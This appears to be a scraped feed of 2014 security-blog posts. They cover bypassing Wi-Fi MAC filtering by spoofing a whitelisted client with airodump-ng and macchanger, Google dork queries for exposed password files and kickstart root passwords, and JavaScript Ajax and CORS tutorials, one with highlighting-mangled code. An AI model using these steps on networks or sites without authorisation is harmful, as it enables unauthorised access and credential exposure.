Address filter.</p> <p>Here also, we use <strong>airmon-ng</strong> and <strong>airodump-ng</strong> to bypass the filter. Lets start the tutorial:First launch the airmon-ng to start the monitoring mode. To start monitoring give the following command:</p> <p><code class="language-plaintext highlighter-rouge">sudo airmon-ng start wlan0</code></p> <p>This will start the monitoring mode. Now we want to see the monitoring on our terminal so that we can analyze the network according to the results. To do that, give the command</p> <p><code class="language-plaintext highlighter-rouge">sudo airodump-ng mon0</code></p> <p>Now that will list all the <strong>SSID’s</strong> available. It will also list the corresponding bssid in the beginning. Now what we have to do is, list out all the info about the SSID that we want to connect in to which is filtering the macs. So use this command :</p> <p><code class="language-plaintext highlighter-rouge">sudo airo­dump-ng -c 4 -a –bssid 00:00:00:00:00:00 mon0</code></p> <p><img src="/images/2014/Airomon.jpg" alt="Airomon in action" /></p> <p>Here we use “<strong>-c 4</strong>” to specify that the SSID we are looking for is on channel number 4 and we use “<strong>-a</strong>” to specify that we need the details of only the clients that have connected to that network. This will also share the mac address of users who is currently using the network. <strong>airodump-ng</strong> will display the mac address of all the people connected to it. So now only one task remaining. We will change our mac address to one of the mac address that we obtain so that we can successfully connect to the network. In order to do that we will use <strong>macchanger.</strong></p> <p>Now, that mac address will be surely on the White list and that is the reason why he is using the network. In the following screenshot you can see a column called Station.</p> <p>Now let us change it to one of the mac address in white list. but before doing that we have to stop the monitoring interfaces, to do that give the command :</p> <p><code class="language-plaintext highlighter-rouge">sudo airmon-ng stop wlan0</code></p> <p>After that use <strong>macchanger</strong> to spoof the mac address:</p> <p><code class="language-plaintext highlighter-rouge">mac­cha­nger -m xx:Xx:Xx:xx:xx:xx wlan0</code></p> <p>Replace the following command with the new mac address with which you need to spoof and thats it, your mac address is spoofed. Now you can successfully connect to the <strong>SSID</strong> without any problems.</p> <p><strong>NOTE:</strong></p> <p>Sometimes it may cause a problem that 2 PC’s with the same <strong>mac address</strong> connect to the same network. There is no way but to take that risk if you really want to connect to the network.</p> Sun, 28 Sep 2014 00:00:00 -0700 https://blog.0daylabs.com/2014/09/28/bypass-mac-address-filtering-using-backtrackkali-linux/ https://blog.0daylabs.com/2014/09/28/bypass-mac-address-filtering-using-backtrackkali-linux/ kali-linux IG: How attackers find out your kid's DNA using Google ? <p>Information Gathering is the first step involved in penetration testing and <strong>Google Dorking</strong> is one of the most easiest way you can find several useful informations (even vulnerabilities, password exposures, etc..) about the target site. Some people believe that “Google Dorking is stupid and won’t revel anything useful. Since Google search is so common, companies will make sure they are not vulnerable to Google Dorking”. But this is absolutely wrong. History has shown us that Google can expose a lot more information that you can imagine.<a href="http://www.smh.com.au/it-pro/security-it/telstra-customer-database-exposed-20111209-1on60.html"> Telstra customer database exposure via Google</a> was a very famous news back in 2011 when whole of their private database information including Usernames, Passwords, customer account number etc.. were revealed.</p> <p>So lets us analyse how this happened: Google Dorking means that you are using Google’s advanced search to to find out all the information regarding your target. If your target is not using a valid and correct <strong>robots.txt, </strong>then things will become much easier. We will deal with robots.txt and Google dorking protection mechanisms at the end of the article. Let us see some ways to search Google so that we can get all txt files uploaded to a particular site:</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>1) intext:admin intext:password filetype:txt site:target.com 2) filetype:bak or filetype:mdb or filetype:sql or filetype:csv or filetype:plist or filetype:txt or filetype:url or filetype:user or filetype:vcs or filetype:pdb site:target.com </code></pre></div></div> <p>The first one searches the entire database of Google for any file <strong>txt</strong> files which contain the string “password” in it. If Google has indexed any txt file like above from your target site, chances are very high that it might contain sensitive information which shouldn’t be shared with 3rd party sites. The second one searches for different types of file types including sql, txt, bak etc.. which are the most commonly used file formats for saving sensitive information. Let us see a more powerful dorking technique:</p> <p>RedHat linux (used on most of the linux servers) has an option called kickstart for unattended installations, where all the details for OS installations are placed and saved in a file with <strong>cfg</strong> extension and read from the file during installations. But this file might not be deleted from the webserver once the installation is complete and might be indexed by Google. A peculiarity of this file is that it contains <strong>rootpw</strong> (root password) which might not be changed after installation is complete.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># Kickstart filetype:cfg </code></pre></div></div> <p>This will search Google for all the sites which has files with <strong>.cfg</strong> as extension and starts with the keyword Kickstart. Similarly there are so many deadly payloads which you can use to recon a target website. A list of different Google search operators can be seen on their <a href="https://support.google.com/websearch/answer/136861?hl=en">support </a>(go through this to understand different search operators). <a href="http://www.exploit-db.com/google-dorks/">Exploit DB Google Hacking database</a> is very famous and you can use it to understand several different ways to do the same.</p> <p>But there is a defect with this approach while pen-testing. Even through Google dorking is a good method to find out sensitive information leakage, manually trying out different search for a given list of targets is very time consuming. So in order to do this, we can use automation tools which are very good at finding sensitive information via Google. Let us see some tools which can automate the tasks for us:</p> <p>1) <a href="http://owtf.github.io/online-passive-scanner/"><strong>OWTF - Passive Online Scanner:</strong></a></p> <p>If you wanna try out basic Google Dorking about your target, <a href="http://owtf.github.io/online-passive-scanner/">OWTF online scanner</a> is the best way. You can simply go to <a href="http://owtf.github.io/online-passive-scanner/">Passive online scanner</a> and enter your target URL. Click on the “target” option in the next page and you can see several results. Click on <strong>OWASP-IG-002 Search engine discovery/reconnaissance Google Hacking, Metadata</strong> &gt; Passive  … You can see online resources which contains several Google advanced search, which you can simply click and see the result.</p> <p>2) <strong><a href="http://www.bishopfox.com/resources/tools/google-hacking-diggity/">Google Hacking Diggity Project</a>:</strong></p> <p>Google Hacking Diggity Project is a very active development project which is dedicated for finding out vulnerable systems and sensitive data in corporate networks by leveraging search engines like Google and Bing. This is considered to be number one tool in finding out vulnerabilities using Google Dorks.</p> <p>3) <strong><a href="http://www.mcafee.com/uk/downloads/free-tools/sitedigger.aspx">SiteDigger:</a></strong></p> <p>SiteDigger is a powerful tool form McAfee which make use of Google cache to find out vulnerabilities, security configurations and protected file exposure. It even supports scanning via proxy or TOR.</p> <p>Preventing this is not very difficult but a bit tricky. The best way to ensure good security is to implement an Authorization mechanism before accessing the sensitive information. By this way, we need not specify the sensitive information explicitly on robots.txt and even if Google try to index the same, it cannot see what’s inside. So Authorization mechanism is the best way to ensure good security against Google Dorking.</p> <p>If creating an Authorization mechanism is absolutely not possible, then try to give long random names to the sensitive files and also try not to reference the file form any locations or other files. By that way, it remains hidden and will be very difficult to exploit. But this doesnot provide a bullet proof security. It could be still prone to attacks.</p> <p><strong>NOTE:</strong></p> <p>Sometimes people will save all the confidential files under a common folder like “hidden” and then will explicitly specify in the <strong>robots.txt</strong> to disallow indexing. This is a very bad way and doesn’t ensure full security. Even though by this way, you can restrict search engines from indexing the folder, robots.txt is a very common file and the first thing an attacker will do as a recon is to analyse the robots.txt of the target site. On the first look itself, attacker can understand there is something valuable in the directory “/hidden” and that could be the reason why the webmaster specified it explicitly in the robots.txt.</p> Fri, 19 Sep 2014 06:01:40 -0700 https://blog.0daylabs.com/2014/09/19/ig-attackers-find-kids-dna-using-google/ https://blog.0daylabs.com/2014/09/19/ig-attackers-find-kids-dna-using-google/ pentest Ajax: Parsing and Reading JSON files <p>Recently we looked into how can we <a href="https://blog.0daylabs.com/2014/09/14/ajax-parsing-reading-xml-files-using-ajax/">read an XML file using Ajax</a>. Now let us see how to do the same with JSON files. Actually Ajax can read any text file. The trick is to know how to parse the files in such a way that we can extract out information we need easily. JSON is a widely used data interchange format. It is very easy for the browsers to parse and generate and is based on JavaScript programming language. Now let us look into how can we parse a JSON file using Ajax:</p> <p>A sample JSON file will be similar to something like this:</p> <p>``{“employees”:[ {“firstName”:”John”, “lastName”:”Doe”}, {“firstName”:”Anna”, “lastName”:”Smith”}, {“firstName”:”Peter”, “lastName”:”Jones”} ]}</p> <p>This could be a sample JSON file.  Now let us see how can we parse and read the contents from JSON file and print only the content that we wants. In the modern day browsers, parsing JSON is very simple. Modern browsers supports parse command which can be used to <strong>Parse</strong> a JSON file and save it to a variable. Let us see how can we do this:</p> <figure class="highlight"><pre><code class="language-html" data-lang="html"> var request = new XMLHttpRequest(); request.open('GET', 'info.json'); request.onreadystatechange = function() { if((request.readyState===4) <span class="err">&amp;&amp;</span> (request.status===200)) { var items = JSON.parse(request.responseText); } } request.send();</code></pre></figure> <p>Parsing JSON is as simple as above.  All most all modern browsers will support <strong>JSON.parse</strong> method so parsing JSON is much simpler now a days.. Now let us see how we can print the result in a list:</p> <figure class="highlight"><pre><code class="language-html" data-lang="html"> var request = new XMLHttpRequest(); request.open('GET', 'info.json'); request.onreadystatechange = function() { if((request.readyState===4) <span class="err">&amp;&amp;</span> (request.status===200)) { var items = JSON.parse(request.responseText); var out = '<span class="nt">&lt;ul&gt;</span>'; for (var key in items) { out += '<span class="nt">&lt;li&gt;</span>' +items[key].name + '<span class="nt">&lt;/li&gt;</span>'; } out += '<span class="nt">&lt;/ul&gt;</span>'; document.getElementByID('id').innerHTML = out; } } request.send();</code></pre></figure> <p>This will add the parsed JSON elements to the webpage. Even though <a href="https://blog.0daylabs.com/2014/09/14/ajax-parsing-reading-xml-files-using-ajax/"><strong>Ajax </strong>was originally designed to work with XML files</a>, it can work with JSON and other formats as well and sometimes  the process is simpler than processing XML. As you can see here, parsing and reading JSON was much simpler than XML.</p> Mon, 15 Sep 2014 03:26:58 -0700 https://blog.0daylabs.com/2014/09/15/ajax-parsing-reading-json-files/ https://blog.0daylabs.com/2014/09/15/ajax-parsing-reading-json-files/ javascript Ajax: Parsing and Reading XML files <p>Ajax was originally created to read data stored in the XML format. But it evolved so much so that you can read even JSON and much more with it. Before understanding how to parse an XML file, you should understand how <a href="https://blog.0daylabs.com/2014/09/13/ajax-everything-you-should-know-about-xmlhttprequest/">XMLHttpRequest()</a> works. If you don’t know much about it, read our article: <a href="https://blog.0daylabs.com/2014/09/13/ajax-everything-you-should-know-about-xmlhttprequest/">Everything you should know about XMLHttpRequest()</a>. So let us see how can we parse an XML file using Ajax. Just like <strong>responseText, </strong>we have something else called <strong>responseXML. </strong>Let us see a sample code to understand how it works:</p> <p>Consider we have a very simple XML file like this:</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>&lt;!-- Edited by XMLSpy --&gt; &lt;note&gt; &lt;to&gt;Tove&lt;/to&gt; &lt;from&gt;Jani&lt;/from&gt; &lt;heading&gt;Reminder&lt;/heading&gt; &lt;body&gt;Don't forget me this weekend!&lt;/body&gt; &lt;/note&gt; </code></pre></div></div> <p>The above code is taken from <a href="http://www.w3schools.com/xml/note.xml">w3schools</a> just for the sake of an example. So this is a very simple XML file. Consider we need to write some information, say <strong>from </strong>tag, from the XML document to the webpage. How can we do that ? Lets see the code to do the same:</p> <figure class="highlight"><pre><code class="language-html" data-lang="html"> var request = new XMLHttpRequest(); request.open('GET', 'info.xml'); request.onreadystatechange = function() { if((request.readyState===4) <span class="err">&amp;&amp;</span> (request.status===200)) { var from = request.responseXML.getElementsByTagName('from')[0].firstChild.nodeValue; document.write(from); console.log(request); } } request.send();</code></pre></figure> <p>Now let us see how the above code works (make sure you read our post about XMLHttpRequest() if you don’t understand other parts of the code). As we can see, when the readyState = 4 and request status =  200, it enters the if condition and assign a new value to the JavaScript variable <strong>from</strong>. In this case, the value of from will be “<strong>Jani</strong>”. So how did that happen? The <strong>request.responseXML</strong> will return the entire XML document and <strong>getElementsByTagName </strong>is a JavaScript DOM method to get all elements which belongs to a particular tag name. Here the tagname is ‘from’. The getElementsByTagName will return a list of all elements with the specified tag name.</p> <p>In order to choose the first element, we append <strong>[0]</strong> to it. This will return the entire from tag to the variable from and now if we print the variable, the value will be <strong><from>Jani</from></strong>. But we don’t want the from tags to get included in the variable and need only the name. The firstChild is to select the first value from a given list. To get only the text of the particular node, we include <strong>nodeValue. </strong>Now this will write only the name “Jani” to the JavaScript variable <strong>from </strong>and won’t include quotes or tags.</p> <p>What if there are more than one names and you need to print a list of names to the page ? The common idea is to write the contents inside the for loop. So the code can be modified as:</p> <figure class="highlight"><pre><code class="language-html" data-lang="html"> var request = new XMLHttpRequest(); request.open('GET', 'info.xml'); request.onreadystatechange = function() { if((request.readyState===4) <span class="err">&amp;&amp;</span> (request.status===200)) { var items = request.responseXML.getElementsByTagName('tag-id'); var out = '<span class="nt">&lt;ul&gt;</span>'; for (var i = 0; i <span class="nt">&lt;</span> <span class="nt">items.length</span><span class="err">;</span> <span class="na">i</span><span class="err">++)</span> <span class="err">{</span> <span class="na">out</span><span class="err">+=</span> <span class="err">'&lt;</span><span class="na">li</span><span class="nt">&gt;</span>' + items[i].firstChild.nodeValue + '<span class="nt">&lt;/li&gt;</span>'; } out += '<span class="nt">&lt;/ul&gt;</span>'; document.getElementById("id").innerHTML = out; } } request.send();</code></pre></figure> <p>The above code will iterate through the entire list returned by <code class="language-plaintext highlighter-rouge">getElementByTagName()</code> and create a new unordered list. We add each element as a list item and append it to a variable named ‘<strong>out</strong>’. Then we send the variable back to HTML page and replace a particular div id’s <code class="language-plaintext highlighter-rouge">innerHTML</code> with the new list we created.</p> Sun, 14 Sep 2014 10:12:34 -0700 https://blog.0daylabs.com/2014/09/14/ajax-parsing-reading-xml-files-using-ajax/ https://blog.0daylabs.com/2014/09/14/ajax-parsing-reading-xml-files-using-ajax/ javascript Ajax: Everything you should know about XMLHttpRequest() <p><strong>Ajax</strong> (Asynchronous Javascript and XML)  is  web development technique for creating better, faster, and more interactive web applications using which they can send and retrieve data from the server asynchronously (in the background) without interfering with the display and behavior of the existing page.</p> <p>So what does this really mean? Consider you have a webpage in which you have some information in the sidebar which needs to be loaded when user clicks or hovers above it. In a normal case, if new information has to be added to the web page, it must give another request to the server and the entire web page should get reloaded. That consumes a lot of time/bandwidth. But if we use Ajax, the browser sends a request to the server but only necessary information is send back by the server and is displayed in the web page without getting reloaded.</p> <p>So in practical how does this work ? This is being done by using <strong>XMLHttpRequest()</strong> object. Let us look into a sample code to understand how XMLHttpRequest() works generally.</p> <figure class="highlight"><pre><code class="language-html" data-lang="html"> var request = new XMLHttpRequest(); request.open('GET', 'info.txt', false); request.send(); console.log(request);</code></pre></figure> <p>This is a very simple XMLHttpRequest(). What it does is, it creates an object named <strong>request</strong>. Then by using the object, we call the function <strong>request.open() </strong>with the 3 must have arguments namely:</p> <p>1)  The type of HTTP request (GET/POST)</p> <p>2) The content to be retrieved</p> <p>3) Specifying whether to use synchronous or asynchronous request.</p> <p>In the above code, I used synchronous method to access data (we will get into synchronous and asynchronous types later in this post). In order to see how the code works, I added an extra line to the code like this: <strong>console.log(request); . </strong>What it does is that, it dumps the information about the request into the browser console window and we can see if there is any issues with the request we made (makes it easier for debugging). A successful request console log looks something like this:</p> <p>From this you can see that when a request becomes successful when <strong>readyState</strong> =4 and <strong>status</strong> = 200. The responseText property always stores the test of the response. So in order to write the response to the webpage, we can modify the above code like this:</p> <figure class="highlight"><pre><code class="language-html" data-lang="html"> var request = new XMLHttpRequest(); request.open('GET', 'info.txt', false); request.send(); console.log(request); if(request.status === 200) { document.writeln(request.responseText); }</code></pre></figure> <p>This will write the responseText into the webpage. Using <strong>document.writeln</strong> is not recommended to write any of the responses to webpages as it can get exploited to <strong>Cross Domain XSS.</strong> But here, let us use the method and in future tutorials, we will use more advanced techniques. Now let us see what is the difference between synchronous and asynchronous requests.</p> <p>In the code above, we give the 3rd parameter of <strong>open()</strong> function as ‘<strong>false’ </strong>to make it <strong>synchronous</strong> request. While doing a synchronous request, browser will wait until it receives the response or the function completes. But this is not necessarily a good option. let us see why. Consider you need to send around 100 requests like this:</p> <figure class="highlight"><pre><code class="language-html" data-lang="html"> for( var i = 0; i <span class="nt">&lt;</span> <span class="err">100;</span> <span class="na">i</span><span class="err">++</span> <span class="err">)</span> <span class="err">{</span> <span class="na">var</span> <span class="na">request = </span><span class="s">new</span> <span class="na">XMLHttpRequest</span><span class="err">();</span> <span class="na">request.open</span><span class="err">('</span><span class="na">GET</span><span class="err">',</span> <span class="err">'</span><span class="na">info.txt</span><span class="err">',</span> <span class="na">false</span><span class="err">);</span> <span class="na">request.send</span><span class="err">();</span> <span class="na">console.log</span><span class="err">(</span><span class="na">request</span><span class="err">);</span> <span class="na">if(request.status =</span><span class="s">==</span> <span class="err">200)</span> <span class="err">{</span> <span class="na">document.writeln</span><span class="err">(</span><span class="na">request.responseText</span><span class="err">);</span> <span class="err">}</span> <span class="err">}</span></code></pre></figure> <p>Try executing the above code. You will see that browser will take sometime before showing the output. This happens because browser is waiting to show the output once it completes the execution. This will take considerable amount of time to display if the requests are larger than 100. So a better way is to write asynchronous requests.</p> <p>Ajax (Asynchronous Javascript and XML) really means that we should be using an Asynchronous call :P .. So let us modify the above code so that we change it from synchronous to asynchronous request.</p> <figure class="highlight"><pre><code class="language-html" data-lang="html"> var request = new XMLHttpRequest(); request.open('GET', 'info.txt'); request.onreadystatechange = function() { if((request.readyState===4) <span class="err">&amp;&amp;</span> (request.status===200)) { console.log(request); document.writeln(request.responseText); } } request.send();</code></pre></figure> <p>When the readyState = 4 and status = 200 (which means the call was success and response is ready) we can simply write the responseText to the web page. Here it is not mandatory to specify <strong>true </strong>as a 3rd parameter in open() function because by default, browsers will use asynchronous method which need not be specified explicitly. If you want, you can simply add <strong>true</strong> as a 3rd parameter, even then script will work fine.</p> <p>NOTE:</p> <p>While using XMLHttpRequest(), request should be made only to the same domain from which the web page gets loaded. The browsers will strictly follow <strong>same origin policy. </strong>If you want do a <a href="https://blog.0daylabs.com/2014/09/06/cors-how-cross-domain-call-works-in-browsers/">Cross Domain Ajax call</a>, there should be some modifications for the above code. Read more about Cross Origin Resource Sharing: <a href="https://blog.0daylabs.com/2014/09/06/cors-how-cross-domain-call-works-in-browsers/">CORS: How cross domain call works in browsers?</a></p> Sat, 13 Sep 2014 09:17:34 -0700 https://blog.0daylabs.com/2014/09/13/ajax-everything-you-should-know-about-xmlhttprequest/ https://blog.0daylabs.com/2014/09/13/ajax-everything-you-should-know-about-xmlhttprequest/ javascript CORS: How cross domain call works in browsers? <p><strong>Cross Origin Resource Sharing (CORS)</strong> is one of the most useful features of HTML5. CORS is a mechanism that allows many resources (e.g., fonts, JavaScript, etc.) on a web page to be requested from another domain outside of the domain where the resource originated from. In short, if you want  to use a JavaScript code inside your webpage which is already being saved as a .js file in another domain, instead of copying the code to the webpage again, you can do a Cross Domain call to the JavaScript file and can make use of it in the webpage. By default, such “cross domain” calls are not allowed by the browsers because of <a href="http://en.wikipedia.org/wiki/Same_origin_policy">same origin security policy</a>. We can achieve this with the help of XMLHttpRequest.</p> <p><strong>XMLHttpRequest</strong> is an API available to scripting languages like JavaScript which can be used for cross domain calls. It works in a simply way just like browsers, it sends an <strong>HTTP</strong> request to a web server and loads the results back to the webpage from which we called. While sending the request, the browser add an HTTP header which states the origin from which the request has been generated. The web server will receive this request and checks if the originated domain is allowed to access the requested resource.  Let us see an example where I host a script on a site which intakes a url/domain name as a parameter and returns its IP address:</p> <figure class="highlight"><pre><code class="language-html" data-lang="html"> var url = "http://examplesite.com/ip.php?domain=" + encodeURI(q); var http = new XMLHttpRequest(); var ip = '' http.open("GET", url, true); http.responseType = "text"; http.onreadystatechange = function() { if (http.readyState == 4 <span class="err">&amp;&amp;</span> http.status == 200) { ip = http.responseText } } http.send(null);</code></pre></figure> <p>Let us see what the above script do. Let us assume that we have a JavaScript variable named “<strong>q”</strong> which contains the URL of which we need to get the IP address. So first we are creating a new variable named <strong>url </strong>in which we are creating the absolute path to where we host our ip.php which returns the corresponding IP address. The ip.php file looks like this:</p> <figure class="highlight"><pre><code class="language-php" data-lang="php"> <span class="cp">&lt;?php</span> <span class="nb">header</span><span class="p">(</span><span class="s1">'Access-Control-Allow-Origin: *'</span><span class="p">);</span> <span class="nb">header</span><span class="p">(</span><span class="s1">'Access-Control-Allow-Methods: GET'</span><span class="p">);</span> <span class="k">foreach</span> <span class="p">(</span><span class="nv">$_GET</span> <span class="k">as</span> <span class="nv">$key</span><span class="p">)</span> <span class="k">echo</span> <span class="nb">gethostbyname</span><span class="p">(</span><span class="nv">$key</span><span class="p">);</span> <span class="cp">?&gt;</span></code></pre></figure> <p>Assume that the ip.php file is hosted in <code class="language-plaintext highlighter-rouge">http://examplesite.com/ip.php</code>. As you can see, ip.php takes a variable as an argument. So while creating an http request, we are sending the URL (of which we need to get ip) to the ip.php using a <strong>GET</strong> request. If you pass google.com as a URL, the request goes like this: <strong>http://examplesite.com/ip.php?domain=google.com</strong>. Now, lets get back to the main script. The statement <strong>var http = new XMLHttpRequest()</strong> will initiate a new request and store it in a variable named http.</p> <p>The <code class="language-plaintext highlighter-rouge">onreadystatechange()</code> stores a function (or the name of a function) to be called automatically, each time the <strong>readyState</strong> property changes. When the readyState is equal to 4 and status is 200, the cross domain call request gets back its response and it can be stored into a variable.</p> <p>The <code class="language-plaintext highlighter-rouge">readyState</code> equals to <strong>4</strong> means that the request is successfully completed (the ip.php function is correctly executed) and the response is ready.</p> <p>While writing the <code class="language-plaintext highlighter-rouge">ip.php</code>, I included 2 statements <code class="language-plaintext highlighter-rouge">header('Access-Control-Allow-Origin: *')</code>; which is very necessary for this script to work. Here <code class="language-plaintext highlighter-rouge">Access-Control_Allow-Origin: *</code>  means that any domain can make a <code class="language-plaintext highlighter-rouge">cross domain call</code> (althrough this should don’t be the case with real world applications) to this file. If you want to restrict it to limited number of sites, you can replace your domain name in the place of * . If this header is missing, you cannot make a cross domain call because by default, it will block all requests generating from external domain according to the <a href="http://en.wikipedia.org/wiki/Same_origin_policy">same origin security policy</a>.</p> Sat, 06 Sep 2014 23:46:18 -0700 https://blog.0daylabs.com/2014/09/06/cors-how-cross-domain-call-works-in-browsers/ https://blog.0daylabs.com/2014/09/06/cors-how-cross-domain-call-works-in-browsers/ javascript Javascript: Splitting a URL into parts using Regex <p><strong>JavaScript</strong> (js) is a lightweight, interpreted, object-oriented language with <a href="https://en.wikipedia.org/wiki/First-class_functions">first-class functions</a>, most known as the scripting language for Web pages. Most of the web application developers, designers etc.. use js on a daily basis. Recently I got selected for <a href="https://www.google-melange.com/gsoc/homepage/google/gsoc2014">Google Summer of code 2014</a>, and a part of my project was related to JavaScript where I had to make use of JavaScript for splitting a URL into corresponding parts. When I googled this, I came across many tutorials but later on I set down to write a function making use of the powerful JavaScript Regex (thanks to my friend, Arjun, who helped me in writing this). Here is the code that I wrote:</p> <figure class="highlight"><pre><code class="language-javascript" data-lang="javascript"> <span class="kd">function</span> <span class="nx">subDomain</span><span class="p">(</span><span class="nx">url</span><span class="p">)</span> <span class="p">{</span> <span class="nx">url</span> <span class="o">=</span> <span class="nx">url</span><span class="p">.</span><span class="nx">replace</span><span class="p">(</span><span class="k">new</span> <span class="nb">RegExp</span><span class="p">(</span><span class="sr">/^s+/</span><span class="p">),</span> <span class="dl">""</span><span class="p">);</span> <span class="nx">url</span> <span class="o">=</span> <span class="nx">url</span><span class="p">.</span><span class="nx">replace</span><span class="p">(</span><span class="k">new</span> <span class="nb">RegExp</span><span class="p">(</span><span class="sr">/s+$/</span><span class="p">),</span> <span class="dl">""</span><span class="p">);</span> <span class="nx">url</span> <span class="o">=</span> <span class="nx">url</span><span class="p">.</span><span class="nx">replace</span><span class="p">(</span><span class="k">new</span> <span class="nb">RegExp</span><span class="p">(</span><span class="sr">/</span><span class="se">\/</span><span class="sr">g</span><span class="se">)</span><span class="sr">, "/</span><span class="dl">"</span><span class="s2">); url = url.replace(new RegExp(/^http://|^https://|^ftp:///i), </span><span class="dl">""</span><span class="s2">); url = url.replace(new RegExp(/^www./i), </span><span class="dl">""</span><span class="s2">); url = url.replace(new RegExp(//(.*)/), </span><span class="dl">""</span><span class="s2">); if (url.match(new RegExp(/.[a-z]{2,3}.[a-z]{2}$/i))) { url = url.replace(new RegExp(/.[a-z]{2,3}.[a-z]{2}$/i), </span><span class="dl">""</span><span class="s2">); } else if (url.match(new RegExp(/.[a-z]{2,4}$/i))) { url = url.replace(new RegExp(/.[a-z]{2,4}$/i), </span><span class="dl">""</span><span class="s2">); } var subDomain = (url.match(new RegExp(/./g))) ? true : false; return (subDomain); } function parseUrl(url) { var parser = document.createElement('a'); parser.href = url; var datas = [parser.hostname, parser.port, parser.pathname]; return (datas); } function printer(test_var) { var k = </span><span class="dl">""</span><span class="s2">; k = test_var.toString(); var k1 = addhttp(k); q = k1[0]; scheme = k1[2]; k = k1[1]; k = parseUrl(k); return k; } function addhttp(url) { var k3 = </span><span class="dl">""</span><span class="s2"> if (url.match(/http:///)) { url = url.substring(7); k3 = </span><span class="dl">"</span><span class="nx">http</span><span class="p">:</span><span class="c1">//"</span> <span class="p">}</span> <span class="k">if</span> <span class="p">(</span><span class="nx">url</span><span class="p">.</span><span class="nx">match</span><span class="p">(</span><span class="sr">/https:/</span><span class="c1">//)) {</span> <span class="nx">url</span> <span class="o">=</span> <span class="nx">url</span><span class="p">.</span><span class="nx">substring</span><span class="p">(</span><span class="mi">8</span><span class="p">);</span> <span class="nx">k3</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">https://</span><span class="dl">"</span> <span class="p">}</span> <span class="kd">var</span> <span class="nx">k</span> <span class="o">=</span> <span class="dl">""</span><span class="p">;</span> <span class="nx">k</span> <span class="o">=</span> <span class="nx">url</span><span class="p">;</span> <span class="k">if</span> <span class="p">(</span><span class="nx">url</span><span class="p">.</span><span class="nx">match</span><span class="p">(</span><span class="sr">/^www./</span><span class="p">))</span> <span class="p">{</span> <span class="nx">url</span> <span class="o">=</span> <span class="nx">url</span><span class="p">.</span><span class="nx">substring</span><span class="p">(</span><span class="mi">4</span><span class="p">);</span> <span class="p">}</span> <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="sr">/^</span><span class="se">(</span><span class="sr">f|ht</span><span class="se">)</span><span class="sr">tps</span><span class="se">?</span><span class="sr">:/</span><span class="c1">//i.test(url)) {</span> <span class="nx">url</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">http://</span><span class="dl">"</span> <span class="o">+</span> <span class="nx">url</span><span class="p">;</span> <span class="p">}</span> <span class="kd">var</span> <span class="nx">k2</span> <span class="o">=</span> <span class="p">[</span><span class="nx">k</span><span class="p">,</span> <span class="nx">url</span><span class="p">,</span> <span class="nx">k3</span><span class="p">]</span> <span class="k">return</span> <span class="nx">k2</span><span class="p">;</span> <span class="p">}</span> <span class="c1">//var q = 'https://demo.testfire.net:1234/hey'</span> <span class="c1">//var output = document.getElementById('output');</span> <span class="kd">var</span> <span class="nx">temp</span> <span class="o">=</span> <span class="dl">""</span><span class="p">;</span> <span class="kd">var</span> <span class="nx">hosts</span> <span class="o">=</span> <span class="dl">""</span><span class="p">;</span> <span class="kd">var</span> <span class="nx">port</span> <span class="o">=</span> <span class="dl">""</span><span class="p">;</span> <span class="kd">var</span> <span class="nx">scheme</span> <span class="o">=</span> <span class="dl">""</span><span class="p">;</span> <span class="kd">var</span> <span class="nx">path</span> <span class="o">=</span> <span class="dl">""</span><span class="p">;</span> <span class="kd">var</span> <span class="nx">sub</span> <span class="o">=</span> <span class="dl">""</span><span class="p">;</span> <span class="kd">var</span> <span class="nx">datas</span> <span class="o">=</span> <span class="nx">printer</span><span class="p">(</span><span class="nx">q</span><span class="p">);</span> <span class="nx">sub</span> <span class="o">=</span> <span class="nx">datas</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span> <span class="nx">port</span> <span class="o">=</span> <span class="nx">datas</span><span class="p">[</span><span class="mi">1</span><span class="p">];</span> <span class="nx">path</span> <span class="o">=</span> <span class="nx">datas</span><span class="p">[</span><span class="mi">2</span><span class="p">];</span> <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nx">subDomain</span><span class="p">(</span><span class="nx">sub</span><span class="p">))</span> <span class="p">{</span> <span class="nx">hosts</span> <span class="o">=</span> <span class="nx">sub</span><span class="p">;</span> <span class="p">}</span> <span class="k">else</span> <span class="p">{</span> <span class="nx">hosts</span> <span class="o">=</span> <span class="nx">sub</span><span class="p">.</span><span class="nx">split</span><span class="p">(</span><span class="dl">"</span><span class="s2">.</span><span class="dl">"</span><span class="p">)[</span><span class="mi">1</span><span class="p">]</span> <span class="o">+</span> <span class="dl">"</span><span class="s2">.</span><span class="dl">"</span> <span class="o">+</span> <span class="nx">sub</span><span class="p">.</span><span class="nx">split</span><span class="p">(</span><span class="dl">"</span><span class="s2">.</span><span class="dl">"</span><span class="p">)[</span><span class="mi">2</span><span class="p">];</span> <span class="p">};</span> <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nx">port</span><span class="p">)</span> <span class="p">{</span> <span class="nx">port</span> <span class="o">=</span> <span class="mi">80</span><span class="p">;</span> <span class="p">}</span> <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nx">scheme</span><span class="p">)</span> <span class="p">{</span> <span class="nx">scheme</span> <span class="o">=</span> <span class="dl">'</span><span class="s1">http://</span><span class="dl">'</span><span class="p">;</span> <span class="p">}</span></code></pre></figure> <p>One obvious question that comes to everyone’s mind is that, what the hell does this code do ?. I can explain that. Even though this code looks very huge, its functionality is very simple. Here I’m assuming that you have the URL to split it in a variable named “<strong>q</strong>”. If so, the URL is passed as an argument to the function printer and the splitting occurs. After the splitting, 5 new JavaScript variables are created namely <strong>scheme</strong>, <strong>host</strong>, <strong>port</strong>, <strong>path **and **sub</strong>.</p> <p>For example, consider that the URL saved in the variable <strong>q</strong> is “<strong>http:/security.securethelock.com:443/hey</strong>”. After the splitting, the 5 new variables will be created with the following values in it:</p> <p><strong>scheme</strong>: http://</p> <p><strong>host</strong>: securethelock.com</p> <p><strong>port</strong>: 443</p> <p><strong>path</strong>: hey</p> <p><strong>sub</strong>: security.securethelock.com</p> <p>If <strong>port</strong> is not specified, the default value, 80,  will be stored. If q is a main domain (and not a subdomain) like “http://www.securethelock.com”, <strong>sub = host =</strong> securethelock.com . If path is not specified, the corresponding variable will be empty.</p> Sat, 06 Sep 2014 